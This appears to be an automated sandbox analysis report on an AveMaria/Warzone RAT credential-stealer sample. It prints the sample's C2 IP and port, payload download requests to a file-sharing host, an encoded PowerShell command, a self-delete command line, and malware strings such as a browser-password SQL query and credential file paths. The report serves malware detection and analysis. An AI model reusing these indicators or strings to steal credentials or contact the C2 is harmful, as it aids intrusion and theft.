Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
Analysis ID:756122
MD5:373574c70ab6f299813fdafa9c12ab9b
SHA1:e6dbfbbe58f87e70da25f5cd31e526ddbceb679e
SHA256:ad8184627690f50da83d52fa3b92ed2597e279527821ffdede20240d19cc3e21
Tags:exe
Infos:

Detection

AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected AveMaria stealer
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Contains functionality to hide user accounts
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses ipconfig to lookup or modify the Windows network settings
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe (PID: 5016 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe MD5: 373574C70AB6F299813FDAFA9C12AB9B)
    • powershell.exe (PID: 1328 cmdline: "powershell" Get-Date MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 4168 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig/release MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 1248 cmdline: ipconfig /release MD5: B0C7423D02A007461C850CD0DFE09318)
    • powershell.exe (PID: 2748 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5776 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig/renew MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 6100 cmdline: ipconfig /renew MD5: B0C7423D02A007461C850CD0DFE09318)
  • cleanup

Malware Configuration

Threatname: AveMaria

{"C2 url": "62.102.148.158", "port": 62641}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
      00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AveMaria_31d2bce9unknownunknown
      • 0x18e60:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
      • 0x17748:$a2: SMTP Password
      • 0x16988:$a3: select signon_realm, origin_url, username_value, password_value from logins
      • 0x18ce8:$a5: for /F "usebackq tokens=*" %%A in ("
      • 0x17178:$a6: \Torch\User Data\Default\Login Data
      • 0x17ce4:$a8: "os_crypt":{"encrypted_key":"
      • 0x17610:$a10: \logins.json
      • 0x17c5c:$a11: Accounts\Account.rec0
      • 0x18a88:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
      00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
            0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpackINDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOMDetects executables embedding command execution via IExecuteCommand COM objectditekSHen
            • 0x16f89:$r1: Classes\Folder\shell\open\command
            • 0x16fac:$k1: DelegateExecute
            0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpackMALWARE_Win_WarzoneRATDetects AveMaria/WarzoneRATditekSHen
            • 0x16554:$s1: RDPClip
            • 0x17358:$s2: Grabber
            • 0x16948:$s3: Ave_Maria Stealer OpenSource
            • 0x16a48:$s4: \MidgetPorn\workspace\MsgBox.exe
            • 0x1677e:$s5: @\cmd.exe
            0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpackAveMaria_WarZoneunknownunknown
            • 0x16d20:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
            • 0x16a74:$str2: MsgBox.exe
            • 0x16948:$str6: Ave_Maria
            • 0x15fe8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
            • 0x15608:$str8: SMTP Password
            • 0x15fc0:$str12: \sqlmap.dll
            0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
              Click to see the 17 entries

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.2.462.102.148.15849698626412852347 11/29/22-16:56:37.231932
              SID:2852347
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:62.102.148.158192.168.2.462641496982852350 11/29/22-16:56:37.391216
              SID:2852350
              Source Port:62641
              Destination Port:49698
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.462.102.148.15849698626412852355 11/29/22-16:56:37.392528
              SID:2852355
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.462.102.148.15849698626412852352 11/29/22-16:56:37.392528
              SID:2852352
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.462.102.148.15849698626412839088 11/29/22-16:56:40.347271
              SID:2839088
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:62.102.148.158192.168.2.462641496982852346 11/29/22-16:56:37.208383
              SID:2852346
              Source Port:62641
              Destination Port:49698
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.462.102.148.15849698626412839089 11/29/22-16:56:37.392528
              SID:2839089
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.462.102.148.15849698626412852351 11/29/22-16:56:40.347271
              SID:2852351
              Source Port:49698
              Destination Port:62641
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:62.102.148.158192.168.2.462641496982852354 11/29/22-16:56:38.680309
              SID:2852354
              Source Port:62641
              Destination Port:49698
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeAvira: detected
              Yara detected AveMaria stealer
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exeAvira: detection malicious, Label: TR/Dropper.Gen
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exeReversingLabs: Detection: 37%
              Machine Learning detection for sample
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeJoe Sandbox ML: detected
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exeJoe Sandbox ML: detected
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "62.102.148.158", "port": 62641}
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49697 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49701 version: TLS 1.2
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2852346 ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket 62.102.148.158:62641 -> 192.168.2.4:49698
              Source: TrafficSnort IDS: 2852347 ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: TrafficSnort IDS: 2852350 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsCommand 62.102.148.158:62641 -> 192.168.2.4:49698
              Source: TrafficSnort IDS: 2852355 ETPRO TROJAN Ave Maria/Warzone RAT VNCGetModule 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: TrafficSnort IDS: 2852352 ETPRO TROJAN Ave Maria/Warzone RAT DownloadAndExecuteCommand 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: TrafficSnort IDS: 2839089 ETPRO TROJAN Ave Maria RAT Encrypted CnC Checkin (2) 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: TrafficSnort IDS: 2852354 ETPRO TROJAN Ave Maria/Warzone RAT RemoteModuleLoadResponse 62.102.148.158:62641 -> 192.168.2.4:49698
              Source: TrafficSnort IDS: 2839088 ETPRO TROJAN Ave Maria RAT Encrypted CnC KeepAlive Outbound (2) 192.168.2.4:49698 -> 62.102.148.158:62641
              Source: TrafficSnort IDS: 2852351 ETPRO TROJAN Ave Maria/Warzone RAT ListPasswordsResponse 192.168.2.4:49698 -> 62.102.148.158:62641
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 62.102.148.158
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /storage/download/1tQUp1sCtsBK HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /storage/download/EmFT04AdCdjg HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
              Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: powershell.exe, 00000001.00000003.358114104.00000000035E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://filetransfer.io
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Mqombsglp.exe.0.drString found in binary or memory: http://filetransfer.io/data-package/XK4aNvBX/download
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.583673856.00000000026F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
              Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581434532.00000000024E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.426684299.0000000004DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000001.00000003.421845130.00000000081D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581666022.0000000002516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io/data-package/XK4aNvBX/download
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581666022.0000000002516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://filetransfer.io4
              Source: powershell.exe, 00000001.00000002.429476801.0000000004EEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
              Source: powershell.exe, 00000001.00000002.445374191.000000000561F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000001.00000002.448375536.0000000005E10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581841256.0000000002541000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581861359.0000000002545000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s23.filetransfer.io/storage/download/1tQUp1sCtsBK
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581861359.0000000002545000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://s23.filetransfer.io4
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: unknownDNS traffic detected: queries for: filetransfer.io
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /storage/download/1tQUp1sCtsBK HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /storage/download/EmFT04AdCdjg HTTP/1.1Host: s23.filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /data-package/XK4aNvBX/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49696 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49697 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49701 version: TLS 1.2
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputData

              E-Banking Fraud

              barindex
              Yara detected AveMaria stealer
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
              Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
